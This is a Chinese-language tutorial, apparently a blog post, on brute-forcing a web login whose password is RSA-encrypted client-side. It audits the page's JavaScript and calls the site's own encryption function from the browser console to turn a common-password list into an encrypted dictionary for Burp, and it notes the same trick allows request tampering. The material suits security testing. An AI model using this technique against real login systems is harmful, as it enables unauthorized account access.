平台登陆密码请求加密爆破

发现加密请求js脚本

对浏览器前端进行审计,发现了加密的js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
e.encryptedString = function (t, n) {
var i = [
],
a = n.length,
r = 0;
while (r < a) i[r] = n.charCodeAt(r),
r++;
while (i.length % t.chunkSize != 0) i[r++] = 0;
var c,
o,
s,
u = i.length,
l = '';
for (r = 0; r < u; r += t.chunkSize) {
for (s = new h, c = 0, o = r; o < r + t.chunkSize; ++c) s.digits[c] = i[o++],
s.digits[c] += i[o++] << 8;
var d = t.barrett.powMod(s, t.e),
f = 16 == t.radix ? e.biToHex(d)  : e.biToString(d, t.radix);
l += f + ' '
}
return l.substring(0, l.length - 1)
}

打下断点查看变量,发现了明文和密文变量名

1571819723306

找到js内发送请求处

1
2
3
4
5
6
7
8
9
10
11
12
13
c['a'].get(''.concat(u, '/keyPair'));
case 2:
return r = n.sent,
o = r.exponent,
s = r.modulus,
d = l.getKeyPair(o, '', s),
h = l.encryptedString(d, e),
n.prev = 7,
n.next = 10,
c['a'].post(''.concat(u, '/login'), {
account: t,
password: h
});

打下断点查看变量

1571819882865

1571819920248

发现在js里面就是在这里生成密文并发送到服务器端

1571820028796

调用js生成加密密码字典

在控制台内申明一个明文字典数组

1
var  A = ['123456','password','123456789','12345678','12345','111111','1234567','sunshine','qwerty','iloveyou','princess','admin','welcome','666666','abc123','football','123123','monkey','654321','!@#$%^&*','charlie','aa123456','donald','password1','qwerty123','zxcvbnm','121212','bailey','freedom','shadow','passw0rd','baseball','buster','daniel','hannah','thomas','summer','george','harley','222222','jessica','ginger','letmein','abcdef','solo','jordan','55555','tigger','joshua','pepper','sophie','1234','robert','matthew','12341234','andrew','lakers','andrea','1qaz2wsx','starwars','ferrari','cheese','computer','corvette','mercedes','blahblah','maverick','hello','nicole','hunter','1989','amanda','1990','jennifer','banana','chelsea','ranger','1991','trustno1','merlin','cookie','ashley','bandit','killer','aaaaaa','1q2w3e','zaq1zaq1','test','hockey','dallas','whatever','admin123','pussy','liverpool','querty','william','soccer','london','1992','biteme']

声明一个空数组作为密文字典

1
var dist = new Array()

调用加密方法将明文字典加密为密文字典

1
2
3
for(i=0,len=A.length;i<len;i++){
  dist[i]=l.encryptedString(d, A[i])
}console.log(dist)

然后在控制台内就获得了加密后的字典文件

1571820473809

直接使用加密后的字典文件放入burp里面进行爆破就可以了


这套操作也适用于请求加密的情况,可以直接替换掉加密请求达到请求篡改的目的